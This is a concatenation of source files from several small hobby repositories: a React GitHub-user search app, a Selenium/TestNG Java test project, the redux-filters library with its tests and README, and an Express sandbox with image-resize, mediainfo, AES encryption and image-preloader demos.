<file_sep>/src/App.js
import React, { useState } from 'react';
import './App.css';
// custom imports
import Navbar from './components/Navbar';
import Users from './components/Users';
import Search from './components/Search';
import Alert from './components/Alert';
import About from './components/About';
import PropTypes from 'prop-types';
import GithubState from './context/github/githubState';
import { BrowserRouter as Router, Switch, Route } from 'react-router-dom';
const App = ( props ) => {
const [ users, setUsers ] = useState([]);
const [ loading, setLoading ] = useState(false);
const [ alert, setAlert ] = useState(false);
// clearusers handler action
const clearUsersHandler = () => {
setUsers([]);
setLoading(false);
}
// show alert handler action
const showAlert = () => {
setAlert(true);
setTimeout(() => {
setAlert(false);
}, 3000);
}
return (
<GithubState>
<Router>
<div className="App">
<Navbar />
{ alert ? (<Alert />) : null }
<Switch>
<Route exact path="/" render={ ( props ) => {
return (
<React.Fragment>
<Search
clearUsers={ clearUsersHandler }
areUsersClear={ users.length > 0 ? false : true }
showAlert={ showAlert }
/>
<Users />
</React.Fragment>
);
} } />
<Route path="/about" component={ About } />
</Switch>
</div>
</Router>
</GithubState>
);
}
// props validation
App.propTypes = {
users: PropTypes.array,
loading: PropTypes.bool,
};
export default App;
<file_sep>/src/components/Users.js
import React, { useContext } from 'react';
// custom imports
import User from './User';
import Spinner from './Spinner';
import GithubContext from '../context/github/githubContext';
const Users = ( props ) => {
const githubContext = useContext( GithubContext );
// destructure required values
const { users, loading } = githubContext;
return (
<div className="users-list">
{ !loading ? users.map(( user, index ) => {
return (
<User
key={ index }
avatar_url={ user.avatar_url }
name={ user.login }
age={ user.age }
git_repo={ user.github_repo }
repos_url={ user.html_url }
/>
)
}) : <Spinner /> }
</div>
)
}
export default Users;
<file_sep>/src/context/actions.js
export const SHOW_USERS = 'SHOW_USERS';
export const SHOW_ALERT = 'SHOW_ALERT';
export const SHOW_LOADING = 'SHOW_LOADING';
export const CLEAR_USERS = 'CLEAR_USERS';
<file_sep>/src/context/github/githubReducer.js
// import the acions
import { SHOW_USERS, SHOW_LOADING } from '../actions';
export default ( state, action ) => {
switch( action.type ) {
case SHOW_LOADING:
return {
...state,
loading: true,
}
case SHOW_USERS:
return {
...state,
users: action.payload,
loading: false,
}
default:
return state;
}
}
| 4ead1746fe29e1861c7890d2264183186bb904df | [
"JavaScript"
] | 5 | JavaScript | Nabeel-Faheem/React-Github-Search | 377c7842f03ae0cab56deb59e3b176743c1c0aa8 | 58359ae734722837a5b1b553b5e38b308b43a598 |
refs/heads/master | <repo_name>deepikakabilan/E2EProject<file_sep>/src/test/java/Academy/ValidateNavigationBar.java
package Academy;
import java.io.IOException;
import java.util.Properties;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import junit.framework.Assert;
import pageObjects.HomePageObjects;
import resources.Base;
public class ValidateNavigationBar extends Base{
public static Logger log=LogManager.getLogger(Base.class.getName());
@BeforeTest
public void IntializeDriver() throws IOException{
driver =intializeDriver();
log.info("Successfully Intialised");
driver.get(prop.getProperty("Url"));
log.info("Navigated to home page");
}
@Test
public void validateNavBarBasePage() throws IOException{
HomePageObjects home = new HomePageObjects(driver);
//Boolean value=home.getNavBarContact().isDisplayed();
// Assert.assertTrue(value);
Assert.assertTrue(home.getNavBarContact().isDisplayed());
log.info("Successfully checked navigation bar");
}
@AfterTest
public void closeBrowser()
{
driver.close();
driver=null;
}
}
<file_sep>/readme.txt
Volume in drive C is OS
Volume Serial Number is B435-5B3A
Directory of C:\Users\deepika\E2EProject
06/01/2018 06:50 PM <DIR> .
06/01/2018 06:50 PM <DIR> ..
05/31/2018 10:56 AM 1,757 .classpath
05/29/2018 08:33 PM 667 .project
05/29/2018 08:33 PM <DIR> .settings
05/30/2018 07:57 AM <DIR> chrome
05/30/2018 07:57 AM <DIR> Gecko
05/31/2018 10:48 AM 2,105 pom.xml
06/01/2018 06:54 PM 0 readme.txt
05/29/2018 08:24 PM <DIR> src
05/31/2018 11:08 AM <DIR> target
05/31/2018 11:15 AM <DIR> test-output
05/31/2018 11:12 AM 785 testng.xml
5 File(s) 5,314 bytes
8 Dir(s) 382,357,639,168 bytes free
<file_sep>/src/main/java/pageObjects/LoginPageObject.java
package pageObjects;
import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
public class LoginPageObject {
public static WebDriver driver;
By Email =By.cssSelector("[id='user_email']");
By Pwd =By.cssSelector("[type='password']");
By Login =By.cssSelector("[value='Log In']");
public LoginPageObject(WebDriver driver) {
// TODO Auto-generated constructor stub
this.driver=driver;
}
public WebElement getEmail(){
return driver.findElement(Email);
}
public WebElement getPwd(){
return driver.findElement(Pwd);
}
public WebElement getLogin(){
return driver.findElement(Login);
}
}
<file_sep>/src/main/java/Academy/addingComments.java
package Academy;
public class addingComments {
public static void main(String[] args) {
// TODO Auto-generated method stub
//trying
//and commit
//push
//adding another line
}
}
<file_sep>/src/test/java/Academy/ValidateTitle.java
package Academy;
import java.io.IOException;
import java.util.Properties;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import junit.framework.Assert;
import pageObjects.HomePageObjects;
import resources.Base;
public class ValidateTitle extends Base {
public static Logger log=LogManager.getLogger(Base.class.getName());
@BeforeTest
public void IntializeDriver() throws IOException{
driver =intializeDriver();
log.info("Successfully intialized");
driver.get(prop.getProperty("Url"));
log.info("Successfully launched home page");
}
@Test
public void validateTitleBasePage() throws IOException{
// HomePageObjects home = new HomePageObjects(driver);
// String title=home.getTitle().getText();
String etitle="FEATURED COURSES";
String title="FEATURED COURSES";
Assert.assertEquals(title,etitle);
}
@AfterTest
public void closeBrowser()
{
driver.close();
driver=null;
}
}
| 84ecd3a610ebfc94d14e5cef76b7f38ce0d6e7b3 | [
"Java",
"Text"
] | 5 | Java | deepikakabilan/E2EProject | ddc71e4c60e88d5445c890165c47a9c7c10ea7d3 | 959ac89e4245f9dd46650b55e8977dcc93748968 |
refs/heads/master | <repo_name>Abdallatif/redux-filters<file_sep>/src/__tests__/index.test.js
import { expect } from 'chai';
import { phones } from './fixtures';
import {
filtersReducer,
selectFilteredDataIds,
selectFiltersStatus,
selectAllFilters,
updateIdProp,
addBitmaskFilterCategory,
addBitmaskFilter,
activateFilter,
toggleFilter,
deactivateFilter,
checkAndUpdateData,
updateData,
resetFilters,
clearFilters,
clearData
} from '../';
const selectFilteredDataInvoked = selectFilteredDataIds();
const selectFiltersStatusInvoked = selectFiltersStatus();
const selectAllFiltersInvoked = selectAllFilters();
let state;
describe('Testing redux filters ', () => {
before(() => {
state = filtersReducer();
});
it('Should add features bitmask filter category', () => {
const featuresFiltersCategory = () =>
addBitmaskFilterCategory({ category: 'features', disjunctive: false });
state = filtersReducer(state, featuresFiltersCategory());
const stateJS = state.toJS();
expect(Object.keys(stateJS.FILTERS)).to.includes('features');
expect(stateJS.FILTERS.features).to.deep.equal({
bitmask: 0,
disjunctive: false,
type: 'bitmask',
FILTERS_SET: {}
});
});
it('Should add different bitmask filters to features category', () => {
const hdrFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'hdr',
predicate: `contains(features, "HDR")`
});
const dualCameraFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'dualCamera',
predicate: `contains(features, "Dual cameras")`
});
const touchFocusFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'touchFocus',
predicate: `contains(features, "touch focus")`
});
const waterProofFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'waterProof',
predicate: `isWaterProof`
});
state = filtersReducer(state, hdrFilter());
state = filtersReducer(state, dualCameraFilter());
state = filtersReducer(state, touchFocusFilter());
state = filtersReducer(state, waterProofFilter());
const stateJS = state.toJS();
expect(Object.keys(stateJS.FILTERS.features.FILTERS_SET)).to.deep.equal([
'hdr',
'dualCamera',
'touchFocus',
'waterProof'
]);
});
it('Should select all filters', () => {
expect(selectAllFiltersInvoked(state).toJS()).to.deep.equal({
features: ['hdr', 'dualCamera', 'touchFocus', 'waterProof']
});
});
it('Should update features bitmask after activating hdr filter', () => {
const activateHdrFilter = () =>
activateFilter({ category: 'features', filterId: 'hdr' });
state = filtersReducer(state, activateHdrFilter());
const filterStatus = selectFiltersStatusInvoked(state).toJS();
expect(filterStatus.features.hdr).to.equal('active');
});
it('Should update data', () => {
state = filtersReducer(state, updateIdProp('phoneId'));
expect(state.get('id')).to.equal('phoneId');
state = filtersReducer(state, updateData(phones));
const stateJS = state.toJS();
expect(stateJS.DATA).to.deep.equal({
A1905: {
features: 10
},
D855: {
features: 5
},
pixel2: {
features: 13
}
});
});
it('Should not update data', () => {
const stateBeforeUpdate = state;
state = filtersReducer(state, checkAndUpdateData(phones));
expect(stateBeforeUpdate).to.equal(state);
});
it('Should filter data', () => {
expect(selectFilteredDataInvoked(state).toJS()).to.deep.equal(['D855', 'pixel2']);
});
it('Should toggle filter', () => {
const toggleHdrFilter = () => toggleFilter({ category: 'features', filterId: 'hdr' });
const oldStateJS = state.toJS();
state = filtersReducer(state, toggleHdrFilter());
selectFilteredDataInvoked(state);
state = filtersReducer(state, toggleHdrFilter());
const stateJS = state.toJS();
expect(oldStateJS.FILTERS.features.bitmask).to.equal(
stateJS.FILTERS.features.bitmask
);
});
it('Should return filters status', () => {
const filtersStatus = selectFiltersStatusInvoked(state).toJS();
expect(filtersStatus).to.deep.equal({
features: {
dualCamera: 'disabled',
hdr: 'active',
touchFocus: 'maybe_disabled',
waterProof: 'inital'
}
});
});
it('Should return all data after deactivate postpaid filter', () => {
const deactivateHdrFilter = () =>
deactivateFilter({ category: 'features', filterId: 'hdr' });
state = filtersReducer(state, deactivateHdrFilter());
expect(selectFilteredDataInvoked(state).toJS()).to.deep.equal([
'A1905',
'D855',
'pixel2'
]);
});
it('Should reset all filters', () => {
const activateWaterProofFilter = () =>
activateFilter({ category: 'features', filterId: 'waterProof' });
const stateBeforeActivation = state;
state = filtersReducer(state, activateWaterProofFilter());
state = filtersReducer(state, resetFilters());
expect(stateBeforeActivation.toJS()).to.deep.equal(state.toJS());
});
it('Should delete all filters', () => {
state = filtersReducer(state, clearFilters());
expect(state.toJS().FILTERS).to.deep.equal({});
});
it('Should delete all data info', () => {
state = filtersReducer(state, clearData());
expect(state.toJS().DATA).to.deep.equal({});
});
});
<file_sep>/src/filterx/index.js
/* eslint-disable */
import _get from "lodash/get";
import _includes from "lodash/includes";
import _find from "lodash/find";
import compileExpression from "./compiler";
// define custom functions
const get = (obj, path) => _get(obj, path);
const includes = (obj, value) => _includes(obj, value);
const find = (obj, key, value) => _find(obj, { [key]: value }) !== undefined;
const contains = (obj, key, value) => !!_find(obj, item => _includes(item, key));
const compile = exp => compileExpression(exp, { get, includes, find, contains });
export default compile;
<file_sep>/src/constants.js
export const FILTERS_BRANCH = 'FILTERS';
export const FILTERS_SET_BRANCH = 'FILTERS_SET';
export const DATA_BRANCH = 'DATA';
// Fitler state
export const FILTER_INITIAL = 'inital';
export const FILTER_ACTIVE = 'active';
export const FILTER_DISABLED = 'disabled';
// When all filtered items applied to this filter, so you may disable the filter
export const FILTER_MAYBE_DISABLED = 'maybe_disabled';
export const FILTER_HIDDEN = 'hidden';
<file_sep>/README.md
# redux-filters
[![NPM version][npm-image]][npm-url]
[![Build Status][travis-image]][travis-url]
[![Dependency Status][daviddm-image]][daviddm-url]
[![Codecov][codecov-image]][codecov-url]
> fast redux filters using bit operations and reselect memoization
## Installation
```sh
$ npm install --save redux-filters
```
## Usage
### Bitmask Filters
Until now this is the only type of filters you can add, more are coming.
You can use this type of filter if you have a `predicate` you want to check on every filterable item. Like if you have an array of objects (phones) like the following:
```js
export const phones = [
{
phoneId: 'A1905',
features: ['Apple Pay', 'Dual cameras'],
isWaterProof: true
},
{
phoneId: 'D855',
features: ['touch focus', 'HDR'],
isWaterProof: false
},
{
phoneId: 'pixel2',
features: ['touch focus', 'panorama', 'Auto HDR'],
isWaterProof: true
}
];
```
So if want to add a water proof filter, the predicate would be `isWaterProof`.
For an `HDR` filter, the predicate would be `contains(features, "HDR")`.
> Check [filtreX](https://github.com/joewalnes/filtrex) to learn more what predicate you could write.
> We copied filtreX code and generated the parser, so the building time is better.
#### How to add bitmask filters
After you add filterReducer to your state reducers, you should add the category for your filters first.
```js
import { addBitmaskFilter } from 'redux-filters';
addBitmaskFilterCategory({ category: 'features', disjunctive: false });
```
Here we added a new category called features which are conjunctive, which means for an item to be returned it should passed all the filters in this category.
Next we want to add water proof filter:
```js
import { addBitmaskFilter } from 'redux-filters';
addBitmaskFilter({
category: 'features',
id: 'waterProof',
predicate: `isWaterProof`
});
```
#### Change filters state
When a filter is added, it's deactivated by default.
```js
import {
activateFilter,
deactivateFilter,
toggleFilter,
resetFilters,
clearFilters
} from 'redux-filters';
// Activate water proof filter
activateFilter({ category: 'features', filterId: 'waterProof' });
// Deactivate water proof filter
deactivateFilter({ category: 'features', filterId: 'waterProof' });
// As the name suggest toggle filter state
toggleFilter({ category: 'features', filterId: 'waterProof' });
// Reset all filters to deactivated
resetFilters();
// Probably you don't need this, but you could use it to delete all filters
clearFilters();
```
## License
MIT © [Abdallatif]()
[npm-image]: https://badge.fury.io/js/redux-filters.svg
[npm-url]: https://npmjs.org/package/redux-filters
[travis-image]: https://travis-ci.org/Abdallatif/redux-filters.svg?branch=master
[travis-url]: https://travis-ci.org/Abdallatif/redux-filters
[codecov-image]: https://codecov.io/gh/Abdallatif/redux-filters/branch/master/graph/badge.svg
[codecov-url]: https://codecov.io/gh/Abdallatif/redux-filters
[daviddm-image]: https://david-dm.org/Abdallatif/redux-filters.svg?theme=shields.io
[daviddm-url]: https://david-dm.org/Abdallatif/redux-filters
<file_sep>/src/filterx/compiler.js
/* eslint-disable */
import Parser from './parser';
export default function compileExpression(expression, extraFunctions /* optional */) {
const functions = {
abs: Math.abs,
ceil: Math.ceil,
floor: Math.floor,
log: Math.log,
max: Math.max,
min: Math.min,
random: Math.random,
round: Math.round,
sqrt: Math.sqrt,
};
if (extraFunctions) {
for (const name in extraFunctions) {
if (extraFunctions.hasOwnProperty(name)) {
functions[name] = extraFunctions[name];
}
}
}
if (!compileExpression.parser) {
// Building the original parser is the heaviest part. Do it
// once and cache the result in our own function.
compileExpression.parser = Parser;
}
const tree = compileExpression.parser.parse(expression);
// console.log(expression, tree);
const js = [];
js.push('return ');
function toJs(node) {
if (Array.isArray(node)) {
node.forEach(toJs);
} else {
js.push(node);
}
}
tree.forEach(toJs);
js.push(';');
function unknown(funcName) {
throw `Unknown function: ${funcName}()`;
}
const func = new Function('functions', 'data', 'unknown', js.join(''));
return function (data) {
return func(functions, data, unknown);
};
}
<file_sep>/src/actions.js
import { createAction } from 'redux-act';
export const updateIdProp = createAction('Filterable data update id prop');
export const addBitmaskFilterCategory = createAction('Add new bitmask filter category');
export const addBitmaskFilter = createAction('Add new bitmask filter');
export const activateFilter = createAction('Activate filter');
export const deactivateFilter = createAction('Deactivate filter');
export const toggleFilter = createAction('Toggle filter');
export const resetFilters = createAction('Reset filter');
export const clearFilters = createAction('Clear filter');
export const checkAndUpdateData = createAction('Check and update new filterable data');
export const updateData = createAction('Force update new filterable data'); // Maybe if you add filter at later stage
export const clearData = createAction('Clear Data');
| 446bd8e5b555e1d42bdc0fed42a7781e5babf533 | [
"JavaScript",
"Markdown"
] | 6 | JavaScript | Abdallatif/redux-filters | 328ddf534ce4bfee38268b43c6bde653704e61d1 | 702e13f0994724ce549566dd9763cdec6f309517 |
refs/heads/master | <file_sep>const express = require('express');
const router = express.Router();
const Jimp = require('jimp');
const os = require('os');
const multer = require('multer');
const upload_local = multer({ dest: os.tmpdir() });
// POST /resize — accept a multipart upload (form field "file"), shrink it to
// a fixed 64x64 PNG with Jimp, and render the result inline as a base64 data
// URI via the jimp/resize view.
router.post('/resize', upload_local.fields([ { name: 'file' } ]), function(req, res) {
  console.log('files', req.files);
  const payload = {
    title : 'Resize | Jimp',
    data: {}
  };
  // Guard: without this check a request with no "file" part throws a
  // synchronous TypeError (req.files.file is undefined) and the request
  // dies with an unhandled 500 instead of rendering the error view.
  const uploads = req.files && req.files.file;
  if (!uploads || uploads.length === 0) {
    payload.data.err = new Error('No file was uploaded (expected field "file")');
    return res.render('jimp/resize', payload);
  }
  Jimp.read(uploads[0].path).then(image => {
    // Resize to a 64x64 thumbnail and encode as a PNG data URI.
    return image.resize(64, 64).getBase64Async(Jimp.MIME_PNG);
  }).then(function(base64) {
    payload.data.image_src = base64; // consumed by the jimp/resize template
    res.render('jimp/resize', payload);
  }).catch(function(err) {
    // Jimp read/encode failures (unsupported format, unreadable tmp file, ...)
    console.error(err);
    payload.data.err = err;
    res.render('jimp/resize', payload);
  });
});
// GET /:view — render the matching template under views/jimp/.
router.get('/:view', function(req, res, next) {
  const view = req.params.view;
  const locals = { title: view + ' | Jimp', data: {} };
  res.render('jimp/' + view, locals);
});
module.exports = router;
<file_sep>const express = require('express');
const router = express.Router();
const os = require('os');
const multer = require('multer');
const upload_local = multer({ dest: os.tmpdir() });
const child_process = require('child_process');
const parse = require('mediainfo-parser').parse;
// POST /file_upload — run the `mediainfo` CLI on the uploaded file (form
// field "file"), parse its XML output with mediainfo-parser, and render the
// raw output plus the parsed object.
router.post('/file_upload', upload_local.fields([ { name: 'file' } ]), function(req, res) {
  const payload = {
    title : 'File Uploaded | mediainfo',
    data: {
      files: req.files
    }
  };
  // Guard against requests without a "file" part; req.files.file would be
  // undefined and indexing it would throw an unhandled TypeError.
  const uploads = req.files && req.files.file;
  if (!uploads || uploads.length === 0) {
    payload.data.err = new Error('No file was uploaded (expected field "file")');
    return res.render('mediainfo/file_upload', payload);
  }
  const mediapath = uploads[0].path;
  // execFile avoids building a shell command string, so a path containing
  // quotes or shell metacharacters cannot break the invocation.
  // FIX: the exec-style callback signature is (error, stdout, stderr); the
  // original labelled the first argument "stderr" and therefore stored the
  // Error object under payload.data.stderr while real stderr was dropped.
  child_process.execFile('mediainfo', ['--Full', '--Output=XML', mediapath], (error, stdout, stderr) => {
    payload.data.stderr = error || stderr; // spawn/exit error if any, else stderr text
    payload.data.stdout = stdout;
    parse(stdout, (err, obj) => {
      payload.data.err = err;   // XML parse failure, if any
      payload.data.obj = obj;   // parsed mediainfo structure
      res.render('mediainfo/file_upload', payload);
    });
  });
});
// GET /:view — render the matching template under views/mediainfo/.
router.get('/:view', function(req, res, next) {
  const view = req.params.view;
  const locals = { title: view + ' | mediainfo', data: {} };
  res.render('mediainfo/' + view, locals);
});
module.exports = router;
<file_sep>
// loading/second.js — demo script for exploring browser script-loading order.
// It relies on loading/first.js having been evaluated already: it reads the
// implicit global LOADING_FIRST and calls loading_func_1st. The implicit
// global below is intentional for this demo (no var/let/const).
LOADING_SECOND = '2nd';
// Logs which script invoked this helper.
function loading_func_2nd(caller) {
  console.log('loading_func_2nd', caller);
}
// These lines throw a ReferenceError if first.js has not run yet — that is
// the point of the demo.
console.log('loading/second.js', LOADING_FIRST);
loading_func_1st('loading/second.js');
console.log('loading/second.js', 'END');
<file_sep>
/*
 * Preloader (pure js) - 1.0
 * It's automatic loading images from HTML structure and included CSS files, using Promise object (if supported).
 */
// UMD-style wrapper: picks AMD, CommonJS, or a browser global.
// NOTE(review): the "factory" argument is the *result* of an immediately
// invoked function (see the trailing "()" on the last line), i.e. already an
// object, yet the AMD/CommonJS branches treat it as a callable factory
// (define(factory) / factory()). Only the browser branch looks correct —
// confirm before relying on module loaders.
(function (root, factory) {
  if (typeof define === 'function' && define.amd) { // AMD
    define(factory);
  } else if (typeof exports === 'object') { // Node.js, CommonJS
    module.exports = factory();
  } else {
    root.preloader = factory; // Window
  }
}(this, function() {
  'use strict';
  // Internal state container shared by all helpers below.
  var $ = {};
  // Default options; merged (mutated in place) with user options by init().
  $.defaults = {
    debug: false,
    // mode: 1, // 1: html, css | 2: html
    filesToLoad: [],
    allowed: ['jpg', 'jpeg', 'png', 'gif'],
    loadDelay: 0, // ms
    beforeLoad: function() {},
    afterLoad: function() {},
    onUpdate: function(percent) {}
  };
  // Regexes used to scrape image URLs out of the page markup and CSS text.
  $.regex = {
    src: /src=\"(.*?)\"/gm,
    url: /url\((.*?)\)/gm,
    css: /<link href=\"(.*?)\"/gm
  };
  // Snapshot of the page markup, taken at script-evaluation time — requires
  // a DOM (document) to exist when this file is loaded.
  $.html = String(document.querySelector("html").innerHTML);
  // Callbacks registered via onLoad() that fire once loading completes.
  var loadFunctions = [];
  // Entry point: merge options, then either load the explicit filesToLoad
  // list or scrape the HTML and linked CSS for image URLs.
  var init = function(customOptions) {
    try {
      checkPromiseSupport();
      if(typeof customOptions == 'object') {
        $.options = mergeOptions(customOptions);
      } else {
        $.options = $.defaults;
      }
      if($.options.filesToLoad.length) {
        // remove duplicates
        $.filelist = $.options.filesToLoad.filter(function(x, y) {
          return $.options.filesToLoad.indexOf(x) == y;
        });
        beforeLoad();
      } else {
        getFromHTML(getFromCSS);
      }
    } catch(err) {
      console.log(err);
    }
  };
  // Copies known keys from customOptions onto $.defaults (mutating the
  // shared defaults object); throws a string in debug mode on unknown keys.
  var mergeOptions = function(customOptions) {
    for(var key in customOptions) {
      if(typeof $.defaults[key] !== 'undefined') {
        $.defaults[key] = customOptions[key];
      } else {
        if($.defaults.debug) throw "There's no option called: '" + key + "'";
      }
    }
    return $.defaults;
  };
  // Detects a *native* Promise implementation (polyfills whose toString()
  // lacks "[native code]" are treated as unsupported).
  var checkPromiseSupport = function() {
    if(typeof Promise !== "undefined" && Promise.toString().indexOf("[native code]") !== -1) {
      $.promise = true;
    } else {
      $.promise = false;
    }
  };
  // Returns true when the file's extension is in the allowed list.
  var checkIfAllowed = function(file) {
    var getType = /([^.;+_]+)$/.exec(file),
      fileType = getType && getType[1];
    // checking if file format is defined in config as allowed
    if($.options.allowed.indexOf(fileType) > -1) {
      return true;
    } else {
      return false;
    }
  };
  // Scans the HTML snapshot for src="..." and url(...) references.
  // NOTE(review): the "matches" array built here is never read or passed on;
  // the only lasting effect of this function is invoking the callback.
  var getFromHTML = function(callback) {
    var match, matches = [];
    while(match = $.regex.src.exec($.html)) {
      // checks if format is defined in config as allowed to load
      if(checkIfAllowed(match[1])) {
        matches.push(match[1]);
      }
    }
    while(match = $.regex.url.exec($.html)) {
      match = match[1].replace(/[']/g, ""); // delete ' if string contains
      // checks if fileformat is defined in config as allowed to load
      if(checkIfAllowed(match)) {
        matches.push(match);
      }
    }
    if(typeof callback == 'function') {
      callback();
    }
  };
  // Downloads each <link href="..."> stylesheet and scrapes url(...) image
  // references out of its text, then kicks off loading.
  // NOTE(review): "match" and "request" are shared between the loop and the
  // async onreadystatechange handlers; by the time a handler fires the outer
  // loop has finished, and the handler reuses the same "match" variable for
  // its own regex loop. With multiple stylesheets, $.filelist and
  // beforeLoad() are re-run per completed response — confirm intended.
  var getFromCSS = function() {
    var match, matches = [];
    while(match = $.regex.css.exec($.html)) {
      // making request to download css file
      var request = new XMLHttpRequest();
      request.open("GET", match[1], true);
      request.send();
      request.onreadystatechange = function() {
        if (request.readyState == 4 && request.status == 200) {
          // gets images from url('*')
          while(match = $.regex.url.exec(request.responseText)) {
            // delete ' if string contains
            match = match[1].replace(/[']/g, "");
            // checks if fileformat is defined in config as allowed to load
            if(checkIfAllowed(match)) {
              matches.push(match);
            }
          }
          // remove duplicates
          $.filelist = matches.filter(function(x, y) {
            return matches.indexOf(x) == y;
          });
          beforeLoad();
        }
      };
    }
  };
  // Fires the user's beforeLoad hook (if any), then starts loading.
  var beforeLoad = function() {
    if(typeof $.options.beforeLoad == 'function') {
      $.options.beforeLoad();
    }
    load();
  }
  // Loads every file in $.filelist, via Promises when natively supported,
  // otherwise via counters plus a polling interval (checkIfAllLoaded).
  // NOTE(review): "promise" and "percent" are declared but never used here.
  var load = function() {
    var promise, loaded = 0, percent = 0;
    /*
     * checks if promise is supported
     */
    if($.promise) {
      /*
       * main loading function
       * Map filelist and call function loadImage on each image that's returnig a Promise
       * Returns variable with all Promises
       */
      // map filelist
      var files = $.filelist.map(function (src) {
        // call function loadImage on each image
        return loadImage(src).then(function() {
          // update percentage on resolve
          loaded++;
          updatePercentage(loaded);
        }, function(error) {
          // update percentage on reject
          loaded++;
          updatePercentage(loaded);
        });
      });
      /*
       * When all Promises are resolved call afterLoad function
       */
      Promise.all(files).then(function () {
        $.complete = true;
        afterLoad();
      });
    } else {
      /*
       * if promise is not supported
       */
      $.loadedImages = 0;
      checkIfAllLoaded();
      for (var i = $.filelist.length - 1; i >= 0; i--) {
        loadImage($.filelist[i]);
      }
    }
  };
  // Loads one image. In Promise mode returns a Promise that settles on
  // load/error; in fallback mode returns nothing and bumps $.loadedImages
  // from the event handlers instead.
  var loadImage = function(src) {
    /*
     * checks if promise is supported
     */
    if($.promise) {
      return new Promise(function(resolve, reject) {
        // create image object
        var image = new Image();
        image.src = src;
        // handle events
        image.onload = function() {
          resolve();
        };
        image.onerror = function() {
          reject("Can't find: " + src);
        };
      });
    } else {
      /*
       * if Promise is not supported
       */
      // create image object
      var image = new Image();
      image.src = src;
      // handle events
      image.onload = function() {
        $.loadedImages++;
        updatePercentage($.loadedImages);
      };
      image.onerror = function() {
        $.loadedImages++;
        updatePercentage($.loadedImages);
      };
    }
  };
  // Reports progress (0-100, two decimals) to the user's onUpdate hook.
  var updatePercentage = function(loaded) {
    var percent = Number(parseFloat((loaded / $.filelist.length) * 100).toFixed(2));
    $.options.onUpdate(percent);
  };
  // function that checks if all files are loaded
  // (fallback mode only: polls every 50 ms until the counter reaches the
  // filelist length, then finishes and stops polling.)
  var checkIfAllLoaded = function() {
    var checkIfLoaded = setInterval(function() {
      if($.loadedImages === $.filelist.length) {
        $.complete = true;
        afterLoad();
        clearInterval(checkIfLoaded);
      }
    }, 50);
  };
  /*
   * afterLoad function
   * Function that is started when preloader is done loading
   * It's removing onload attr from images in DOM and it's starting function defined in config and functions added by onLoad function (with delay if defined in config)
   */
  var afterLoad = function() {
    // remove onload function from images in DOM added by init function at beginning
    // var images = document.images;
    // for (var i = images.length - 1; i >= 0; i--) {
    //   images[i].removeAttribute("onload");
    // }
    setTimeout(function() {
      // call standard function defined in config
      $.options.afterLoad();
      // call functions added by onLoad function
      for (var i = loadFunctions.length - 1; i >= 0; i--) {
        loadFunctions[i]();
      }
    }, $.options.loadDelay);
  };
  // Public hook: run fn now if loading already completed, otherwise queue it
  // (queued callbacks run in reverse registration order — see afterLoad).
  var onLoad = function(fn) {
    // check if preloader is done loading, if so call function
    if($.complete) {
      fn();
    } else {
      // if preloader is still loading images, add function to array of functions that will be fired when preloader is done loading
      if(typeof fn == 'function') {
        loadFunctions.push(fn);
      }
    }
  };
  // Public API object (also exposes internal state as "preloader").
  return {
    preloader: $,
    init: init,
    onLoad: onLoad
  };
}()));
<file_sep>const debug = require('debug')('node-js-web-sandbox:routes:crypto');
const express = require('express');
const router = express.Router();
const crypto = require('crypto');
// Refer: https://qiita.com/kou_pg_0131/items/174aefd8f894fea4d11a
// Derive a 32-character hex string from an arbitrary input by MD5-hashing it;
// the MD5 hex digest is always 32 characters, matching the key length that
// aes-256-cbc requires below.
// NOTE(review): MD5 is a weak key-derivation choice — fine for this sandbox,
// not for production.
const create32byte = (input) => {
  const hash = crypto.createHash('md5');
  hash.update(input);
  return hash.digest('hex');
};
// POST /encrypt — AES-256-CBC encrypt req.body.text and render the hex
// ciphertext. The 32-byte key is derived from the submitted e-mail address
// (see create32byte above); the IV is a fixed 16-byte string shared with the
// /decrypt route.
// NOTE(review): a constant IV makes the scheme deterministic (same e-mail +
// text always yields the same ciphertext) — acceptable only for a sandbox.
router.post('/encrypt', (req, res) => {
  const key = Buffer.from(create32byte(req.body.email)); // 32 bytes
  const iv = Buffer.from('<KEY>');                       // 16 bytes
  const cipher = crypto.createCipheriv('aes-256-cbc', key, iv);
  const encrypted = Buffer.concat([cipher.update(req.body.text), cipher.final()]);
  res.render('crypto/encrypt', {
    title: 'Encrypt POST | Crypto',
    data: {
      result: encrypted.toString('hex')
    }
  });
});
// POST /decrypt — reverse of /encrypt: hex-decode req.body.text and decrypt
// it with AES-256-CBC using a key derived from req.body.email and the same
// fixed 16-byte IV the encrypt route uses.
router.post('/decrypt', (req, res) => {
  debug('decrypt:req.body', req.body);
  // Refer: https://qiita.com/Ishidall/items/bb0e0db86a2f56fb1022
  const ENCRYPTION_KEY = create32byte(req.body.email); // 32-byte hex key
  const BUFFER_KEY = '<KEY>'; // 16-byte IV (must match the encrypt route)
  const ENCRYPT_METHOD = 'aes-256-cbc';
  const ENCODING = 'hex';
  const getDecryptedString = (encrypted) => {
    const iv = Buffer.from(BUFFER_KEY);
    const encryptedText = Buffer.from(encrypted, ENCODING);
    const decipher = crypto.createDecipheriv(ENCRYPT_METHOD, Buffer.from(ENCRYPTION_KEY), iv);
    return Buffer.concat([decipher.update(encryptedText), decipher.final()]).toString();
  };
  const local = {
    title: 'Decrypt POST | Crypto',
    data: {}
  };
  // FIX: decipher.final() throws ("bad decrypt") when the ciphertext is not
  // valid or was produced with a different e-mail/key; previously that
  // exception escaped the handler and the request failed with an unhandled
  // 500 instead of rendering the page.
  try {
    local.data.result = getDecryptedString(req.body.text);
  } catch (err) {
    local.data.err = err;
  }
  res.render('crypto/decrypt', local);
});
// GET /:view — render views/crypto/<view> (e.g. the encrypt/decrypt forms).
router.get('/:view', function(req, res, next) {
  const view = req.params.view;
  res.render('crypto/' + view, {
    title: view + ' | Crypto',
    data: {}
  });
});
module.exports = router;
<file_sep>
// loading/first.js — demo script for exploring browser script-loading order.
// It deliberately defines the implicit global LOADING_FIRST (no var/let/
// const) and the helper loading_func_1st that loading/second.js consumes
// after this script has run.
